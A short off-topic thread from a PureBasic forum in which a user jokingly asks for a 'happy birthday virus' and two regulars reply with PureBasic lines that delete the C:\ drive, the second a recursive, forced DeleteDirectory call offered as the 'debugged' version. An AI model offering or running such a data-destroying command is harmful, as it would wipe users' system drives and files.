Guess what?

For everything that's not in any way related to PureBasic. General chat etc...
User avatar
Joakim Christiansen
Addict
Addict
Posts: 2452
Joined: Wed Dec 22, 2004 4:12 pm
Location: Norway
Contact:

Guess what?

Post by Joakim Christiansen »

It's my damn birthday whoohoooo! (yeah, since the clock is more than 24:00)
Someone make me a happy birthday virus!!
:)
And yeah, everybody visit my page and donate me some money for beer!
I like logic, hence I dislike humans but love computers.
dracflamloc
Addict
Addict
Posts: 1648
Joined: Mon Sep 20, 2004 3:52 pm
Contact:

Post by dracflamloc »

my pleasure!

Code: Select all

repeat 
deletedirectory("C:\","")
delay(1)
forever 


User avatar
Joakim Christiansen
Addict
Addict
Posts: 2452
Joined: Wed Dec 22, 2004 4:12 pm
Location: Norway
Contact:

Post by Joakim Christiansen »

It didn't work, please debug it and see if you can fix the problem! :lol:
I like logic, hence I dislike humans but love computers.
PB
PureBasic Expert
PureBasic Expert
Posts: 7581
Joined: Fri Apr 25, 2003 5:24 pm

Post by PB »

Here's the debugged version:

Code: Select all

DeleteDirectory("C:\","",#PB_FileSystem_Recursive|#PB_FileSystem_Force)
:twisted:
I compile using 5.31 (x86) on Win 7 Ultimate (64-bit).
"PureBasic won't be object oriented, period" - Fred.
User avatar
Joakim Christiansen
Addict
Addict
Posts: 2452
Joined: Wed Dec 22, 2004 4:12 pm
Location: Norway
Contact:

Post by Joakim Christiansen »

Thanks, you guys are great! :wink:
I like logic, hence I dislike humans but love computers.
dracflamloc
Addict
Addict
Posts: 1648
Joined: Mon Sep 20, 2004 3:52 pm
Contact:

Post by dracflamloc »

Ooopssss
Post Reply